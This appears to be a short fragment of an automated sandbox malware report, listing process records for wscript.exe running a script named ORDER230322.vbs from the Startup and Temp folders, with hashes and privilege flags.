                      Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs"
                      Imagebase: 0x7ff601d70000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      Target ID: 14
                      Start time: 11:38:16
                      Start date: 22/03/2023
                      Path: C:\Windows\System32\wscript.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs
                      Imagebase: 0x7ff601d70000
                      File size: 163840 bytes
                      MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
                      Has elevated privileges: false
                      Has administrator privileges: false
                      Programmed in: C, C++ or other language
                      Reputation: high

                      No disassembly